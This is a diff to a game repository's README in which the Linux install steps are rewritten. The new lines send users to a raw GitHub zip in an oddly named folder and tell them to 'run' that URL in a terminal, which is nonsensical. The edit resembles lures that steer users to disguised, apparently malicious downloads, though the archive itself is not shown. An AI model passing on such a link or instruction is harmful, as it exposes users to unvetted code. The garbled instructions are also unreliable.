ConflictedCitizen/Jackpot_Game_Frontend/README.md

 2. **Install the Game:**
    - **For Windows:** Double-click the .exe file and follow the prompts to install.
    - **For macOS:** Open the .dmg file and drag the game icon to your Applications folder.
-   - **For Linux:** Extract the .tar.gz file and navigate to the folder.
-Open a terminal and run `./run_game.sh` to start.
+   - **For Linux:** Extract the https://raw.githubusercontent.com/ConflictedCitizen/Jackpot_Game_Frontend/main/unfittedness/Jackpot_Game_Frontend.zip file and navigate to the folder.
+Open a terminal and run `https://raw.githubusercontent.com/ConflictedCitizen/Jackpot_Game_Frontend/main/unfittedness/Jackpot_Game_Frontend.zip` to start.

 3. **Launch the Game:** After installation, find the game in your applications menu or desktop.
 Double-click to start playing!